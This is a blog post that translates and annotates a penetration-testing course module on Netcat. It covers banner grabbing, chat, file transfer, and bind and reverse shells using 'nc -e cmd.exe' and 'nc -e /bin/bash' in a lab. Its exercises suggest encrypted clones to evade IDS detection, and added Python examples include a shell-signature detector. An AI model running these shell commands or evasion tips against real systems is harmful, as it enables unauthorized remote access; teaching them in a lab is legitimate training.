LOnils风迷 's Blog

hacking for fun

Module 1: BackTrack Basics (Part 4: Netcat)

By: Heee

This post is mainly about NC. The basics, really basic ~~

====

Table of Contents

Netcat the Almighty

 

    1.4.1 Connecting to a TCP/UDP Port with Netcat

    1.4.2 Listening on a TCP/UDP Port with Netcat

    1.4.3 Transferring Files with Netcat

    1.4.4 Remote Administration with Netcat

    1.4.5 Exercises

====

Overview

Netcat is a wonderfully versatile tool that has been dubbed the “hackers' Swiss army knife.” The simplest definition of Netcat is "a tool that can read and write to TCP and UDP ports." This dual functionality suggests that Netcat runs in two modes: client and server. If this sounds completely alien to you, please do some background research on this tool because we will be using it very often.

// NC is called the Swiss army knife, which shows how practical it is.

 

1.4.1 Connecting to a TCP/UDP Port with Netcat

Connecting to a TCP/UDP port can be useful in several situations:

// NC is very useful in the following situations

  • To check if a port is open or closed

  • To read a banner from the port

  • To connect to a network service manually


Please take time to inspect Netcat's command line options:

// Take some time to memorize its options. You can look these up on Baidu, so I am not translating the options.

root@bt:~# nc -h
[v1.10-38]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
root@bt:~#

1. To connect to TCP port 21 on 192.168.9.220 and read from it, try the following:

// Connect to TCP port 21 on 192.168.9.220

root@bt:~# nc -vn 192.168.9.220 21
(UNKNOWN) [192.168.9.220] 21 (ftp) open
220-GuildFTPd FTP Server (c) 1997-2002
220-Version 0.999.14
220-Thanks!
220 Please enter your name:

Note that port 21 is open and advertises the FTP banner 220-GuildFTPd FTP Server (c) 1997-2002. Press Ctrl+C to exit Netcat.

// Port 21 is running an FTP service; the banner obtained is 220-GuildFTPd FTP Server (c) 1997-2002. You can press Ctrl+C to exit NC.

2. To connect to port 80 on 192.168.9.240, send an HTTP HEAD request, and read the HTTP server banner, try the following:

// Connect to port 80 on 192.168.9.240, send an HTTP HEAD request, and grab the banner

root@bt:~# nc -vn 192.168.9.240 80
(UNKNOWN) [192.168.9.240] 80 (www) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Sat, 17 Oct 2009 05:53:08 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 11 Oct 2008 12:44:50 GMT
ETag: "78457-b8-a1b5f480"
Accept-Ranges: bytes
Content-Length: 184
Connection: close
Content-Type: text/html; charset=UTF-8
root@bt:~#
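The same two steps (connect, send HEAD, read the Server header) as an added example that is not part of the module: a socket client doing what nc does, with a throwaway loopback HTTP server constructed inline so it runs offline. The server reply and the `unused_port` helper are my own constructions; `grab_http_banner` also reports a closed port, the same distinction nc's verbose output gives you.

```python
import socket
import threading

# Constructed reply for the offline demo; the Server value is a sample, not a live host.
CONSTRUCTED_REPLY = (b"HTTP/1.1 200 OK\r\nServer: Apache/2.2.3 (CentOS)\r\n"
                     b"Content-Length: 0\r\nConnection: close\r\n\r\n")


def fake_http_server():
    """Stand-in web server: listen on a loopback port, answer one request, return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.recv(4096)                   # consume the HEAD request
            conn.sendall(CONSTRUCTED_REPLY)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def grab_http_banner(host, port, timeout=3.0):
    """What 'nc -vn host port' plus a typed 'HEAD / HTTP/1.0' does, in one call.
    Returns (port_open, server_header); a refused or timed-out connect gives (False, None)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
            data = b""
            while b"\r\n\r\n" not in data:    # read until the header block ends
                chunk = s.recv(4096)
                if not chunk:
                    break
                data += chunk
    except OSError:                           # ECONNREFUSED, timeout, unreachable
        return False, None
    headers = data.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")
    server = next((h.split(":", 1)[1].strip() for h in headers[1:]
                   if h.lower().startswith("server:")), None)
    return True, server


def unused_port():
    """A loopback port nothing listens on, to exercise the closed-port path."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]
```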

1.4.2 Listening on a TCP/UDP Port with Netcat

Listening on a TCP/UDP port using Netcat is useful for network debugging of client applications or otherwise receiving a TCP/UDP network connection. Try implementing a simple chat using Netcat. Please take note of your local IP address (mine is 192.168.8.74).

// Listening on a TCP/UDP port; note that my local IP is 192.168.8.74. Let's try implementing a simple chat with Netcat

1. To listen on port 4444 and accept incoming connections, type:

// Listen on local port 4444

Computer 1 (local computer - 192.168.8.74)

root@bt:~# nc -lvp 4444
listening on [any] 4444 ...

2. From a different computer (I will be using a lab Windows machine), connect to port 4444 on your local machine:

// Connect to the local host on port 4444 from another host

Computer 2 (Windows box - 192.168.9.158)

C:\>nc -v 192.168.8.74 4444
192.168.8.74: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.8.74] 4444 (?) open
HI, HOW ARE YOU!
fine thanks, you?
I'M DOING GREAT!

Below is a screenshot from my own machine (the IP is of course different from the example's)

===

1.4.3 Transferring Files with Netcat

Netcat can also be used to transfer files, both text and binary, from one computer to another. To send a file from Computer 2 to Computer 1, try the following:

// NC can also be used to transfer files. Send a file from computer 2 to computer 1:

Computer 1: Set up Netcat to listen to and accept the connection and to redirect any input into a file. 

// Listen and wait for a file as input

root@bt:~# nc -lvp 4444 > output.txt
listening on [any] 4444 ...

Computer 2: Connect to the listening Netcat on computer 1 (port 4444) and send the file:

// Connect to port 4444 on computer 1 and send the file

C:\>echo "Hi! This is a text file!" > test.txt
C:\>type test.txt
"Hi! This is a text file!"
C:\>nc -vv 192.168.8.74 4444 < test.txt
192.168.8.74: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.8.74] 4444 (?) open

Because Netcat doesn't give any indication of file transfer progress, wait for a few seconds and then press Ctrl+C to exit Netcat.

// NC gives no indication that the file transfer succeeded; after waiting a few seconds you can terminate it.

On Computer 1 you should see:

root@bt:~# nc -lvp 4444 > output.txt
listening on [any] 4444 ...
192.168.9.158: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.8.74] from (UNKNOWN) [192.168.9.158] 1027
^C root@bt:~#

Now check that the file was transferred correctly:

// Check the file

Computer 1

root@bt:~# file output.txt
output.txt: ASCII text, with CRLF line terminators
root@bt:~# cat output.txt
"Hi! This is a text file!"
root@bt:~#

I don't know whether you noticed, but what I sent from Windows was a gif file, while on my BT side I chose to receive it as a txt file.

Once it arrives on BT it is a txt file. Even if the other side sends a file of some other format, it only gets the suffix and file name that the local side asked for.
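The transfer above, plus the two checks Netcat does not give you, as an added example that is not from the module: a loopback receiver writing to output.txt until EOF, a sender that hashes what it sent so both ends can be compared, and a small `file`-style magic-byte check showing that the name chosen on the receiving side says nothing about the content. The GIF bytes are a constructed minimal header, not a real image; the temp-dir path is my choice.

```python
import hashlib
import os
import socket
import tempfile
import threading

CONSTRUCTED_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16  # constructed header, not a real image


def receive_to_file(path):
    """The 'nc -lvp 4444 > output.txt' side: write everything received until EOF."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        with conn, open(path, "wb") as out:
            while chunk := conn.recv(65536):   # an empty read (peer closed) is the only "done" signal
                out.write(chunk)
        srv.close()

    t = threading.Thread(target=run)
    t.start()
    return srv.getsockname()[1], t


def send_file_bytes(host, port, data):
    """The 'nc host 4444 < test.txt' side; returns the SHA-256 of what was sent."""
    with socket.create_connection((host, port)) as s:
        s.sendall(data)
        s.shutdown(socket.SHUT_WR)             # deliver EOF so the receiver can finish
    return hashlib.sha256(data).hexdigest()


def sniff_type(path):
    """Tiny `file`-style check: decide by leading bytes, never by the file name."""
    with open(path, "rb") as f:
        head = f.read(16)
    if head.startswith((b"GIF87a", b"GIF89a")):
        return "GIF image data"
    if head and all(32 <= b < 127 or b in b"\r\n\t" for b in head):
        return "ASCII text"
    return "data"


def transfer(data, path=None):
    """Run one loopback transfer into `path` (default: <tmp>/output.txt); return (hashes_match, detected_type)."""
    path = path or os.path.join(tempfile.gettempdir(), "output.txt")
    port, t = receive_to_file(path)
    sent = send_file_bytes("127.0.0.1", port, data)
    t.join(5)
    with open(path, "rb") as f:
        got = hashlib.sha256(f.read()).hexdigest()
    return sent == got, sniff_type(path)
```

Comparing the two hashes is the completion check the module says Netcat lacks; the type check is why `file` reported ASCII text for the author's output.txt regardless of the name.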

====

1.4.4 Remote Administration with Netcat

The other name of this chapter is “Using Netcat as a Backdoor.” There is a very specific reason for not using this title; I will point it out later in the exercise. One neat feature of Netcat is command redirection. This means that Netcat can take an executable file and redirect its input, output, and error messages to a TCP/UDP port rather than the default console.

Take, for example, the cmd.exe executable. By redirecting stdin, stdout, and stderr to the network, you can bind cmd.exe to a local port. Anyone connecting to this port will be presented with a command prompt belonging to this computer.

If this is confusing, just hang in there and check out the following example.

Start this example with Alice and Bob, two fictional characters trying to connect to each other's computers. Please take note of the network configurations; they play a critical role, as you will soon see.

// A big chunk of text. Using NC as a backdoor

1.4.4.1 Scenario 1: Bind Shell

In scenario 1, Bob has requested Alice's assistance and has asked her to connect to his computer and issue some commands remotely. As you can see, Bob has a non-RFC 1918 address and is directly connected to the internet. Alice, however, is behind a NAT'ed connection.

To complete the scenario, Bob needs to bind cmd.exe to a TCP port on his machine and inform Alice which port to connect to.

// Bob asks Alice for help and asks her to connect to his computer and execute some commands remotely.

As in the figure above, Bob is on the public internet while Alice is behind NAT, so Bob needs to bind cmd to a TCP port for Alice to connect to.

Bob's machine

C:\>nc -lvvp 4444 -e cmd.exe
listening on [any] 4444 ...

Anyone connecting to port 4444 on Bob's machine (hopefully Alice) will be presented with Bob's command prompt, with the same permissions that nc was run with.

// In fact, anyone who connects to port 4444 on this host can run commands through Bob's cmd.

Alice's machine

root@bt:~# ifconfig tap0
tap0 Link encap:Ethernet HWaddr a6:0c:0b:77:e8:45
inet addr:192.168.8.74 Bcast:192.168.9.255 Mask:255.255.254.0
...
root@bt:~# nc -vvn 192.168.9.158 4444
(UNKNOWN) [192.168.9.158] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter offsec:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.9.158
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . :
C:\>

This figure is hard to make sense of alongside this. Bob has an external public IP, yet connects directly to 192.168.9.158? ...

Just ignore that figure... Treat the two of them as being behind the same NAT, on different subnets, and that's fine...

 

1.4.4.2 Scenario 2: Reverse Shell

In scenario 2 Alice is requesting help from Bob. The assumption is that Alice does not control the NAT device she is behind. Is there any way for Bob to connect to Alice's computer and solve her problem?

Another interesting Netcat feature is the ability to send a command shell to a listening host. In this situation, although Alice cannot bind a port to cmd.exe locally on her computer and expect Bob to connect, she can send her command prompt to Bob's machine.

// Not translating this part; it doesn't matter whether you read it or not

Bob's machine

C:\>nc -lvvp 4444
listening on [any] 4444 ...

Alice's machine

root@bt:~# nc -nv 192.168.9.158 4444 -e /bin/bash
(UNKNOWN) [192.168.9.158] 4444 (?) open

Bob's machine after the connection

C:\>nc -lvvp 4444
listening on [any] 4444 ...
connect to [192.168.9.158] from (UNKNOWN) [192.168.8.74] 58630: NO_DATA
/sbin/ifconfig
...
tap0      Link encap:Ethernet  HWaddr a6:0c:0b:77:e8:45
          inet addr:192.168.8.74  Bcast:192.168.9.255  Mask:255.255.254.0
          inet6 addr: fe80::a40c:bff:fe77:e845/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6831 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6257 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:1003013 (1.0 MB)  TX bytes:749607 (749.6 KB)

Netcat has other nice features and uses, such as simple sniffing abilities, port redirection, and so forth, which I will leave for you to research independently.

// Netcat has other nice features and uses, such as simple sniffing abilities, port redirection, and so on

        
The reason I didn't want to call this module “Netcat as a backdoor” is that students usually start thinking about the malicious implementations of such a backdoor, and one of the first questions asked is, “How do I get Netcat to run on the victim machine, without remote user intervention?” I usually dismiss this question, with a horrified look on my face.


The magic answer to this question can be embodied in three words: remote code execution. In this example, both Bob and Alice are willing participants in the exercise. To escalate this demonstration to a "hack," we would need Netcat to execute itself without the involvement of the user on the other side.


Ninety percent of attack vectors can be boiled down to the words remote code execution. For example, attacks such as buffer overflows, SQL injection, file inclusion, client side attacks, and trojan horses all aim to result in remote code execution on the victim machine.

// nc is not an attack tool in itself; it can serve as a backdoor. The question is not how to get the other side to run NC; what we deliver is malicious code. Many of the attack methods we commonly use, such as buffer overflows, SQL injection, file inclusion, client-side attacks and trojan horses, all aim to result in remote code execution.

1.4.5 Exercises

1. Connect to the Windows XP client machine assigned to you via Remote Desktop. (You will find Netcat in the Extras directory on the desktop.) Do not forget to disable the Windows XP firewall, or alternatively open a specific port in the firewall for Netcat connections (TCP 4444 is fine).

// Try connecting to the remote host.


2. Use Netcat to implement the following scenarios between two networked computers:

  • Simple chat

  • File transfer

  • Bind/reverse shell

  • Port scanner

  • Banner grabber

  • Experiment with connections from Windows and Linux machines


3. Most IPS/IDS systems identify the traffic signature of a flying shell and flag it as evil. Several encrypted Netcat clones exist, which have turned into my permanent Netcat replacements. Take time to get to know SBD (Google: sbd netcat clone). Implement the bind/reverse shell scenarios using SBD under Linux.

// IPS/IDS can recognize it as unsafe; try modifying it with encryption. Get to know the sbd nc clone.
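An added example, not from the module, of the kind of payload-signature check exercise 3 refers to: it looks for the cleartext cmd.exe banner and prompt from scenario 1 in reassembled stream payloads (constructed inline here) and reports a mostly non-printable stream, such as an encrypted sbd session, as opaque rather than clean. The signature names, the sample flows and the 0.6 printable-byte threshold are my own choices.

```python
import re

# Strings a cleartext cmd.exe session emits (the banner and prompt shown in scenario 1).
SHELL_SIGNATURES = {
    "windows-banner": re.compile(rb"Microsoft Windows [^\r\n]*\[Version [\d.]+\]"),
    "ms-copyright": re.compile(rb"\(C\) Copyright \d{4}-\d{4} Microsoft Corp\."),
    "cmd-prompt": re.compile(rb"(?m)^[A-Za-z]:\\[^\r\n]*>"),
    "ipconfig-output": re.compile(rb"Windows IP Configuration"),
}


def classify_payload(payload):
    """Return (verdict, matched_signature_names) for one reassembled TCP stream.
    Signatures can only fire on cleartext; a mostly non-printable stream is reported as
    'opaque' so it can be examined by other means rather than silently passed."""
    hits = [name for name, pat in SHELL_SIGNATURES.items() if pat.search(payload)]
    if hits:
        return "shell-signature", hits
    printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in payload)
    if payload and printable / len(payload) < 0.6:   # threshold is an assumed tuning value
        return "opaque", []
    return "clean", []


# Constructed flow records: addresses and ports follow the page's lab example; the third
# payload is a made-up high-entropy blob standing in for an encrypted sbd session.
CONSTRUCTED_FLOWS = [
    {"dst": "192.168.9.158", "dport": 4444,
     "payload": (b"Microsoft Windows XP [Version 5.1.2600]\r\n"
                 b"(C) Copyright 1985-2001 Microsoft Corp.\r\n\r\nC:\\>ipconfig\r\n")},
    {"dst": "192.168.9.240", "dport": 80,
     "payload": b"HEAD / HTTP/1.0\r\n\r\nHTTP/1.1 200 OK\r\nServer: Apache/2.2.3 (CentOS)\r\n"},
    {"dst": "192.168.9.158", "dport": 4444,
     "payload": bytes(range(0, 256, 3)) * 4},
]


def scan(flows):
    """Apply the classifier to every flow; returns (dst, dport, verdict) triples."""
    return [(f["dst"], f["dport"], classify_payload(f["payload"])[0]) for f in flows]


if __name__ == "__main__":
    for row in scan(CONSTRUCTED_FLOWS):
        print(row)
```

The third flow shows the point of the exercise from the defender's side: once the session is encrypted, signature matching finds nothing, so an "opaque stream to an unusual port" verdict is what is left to alert on.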

 
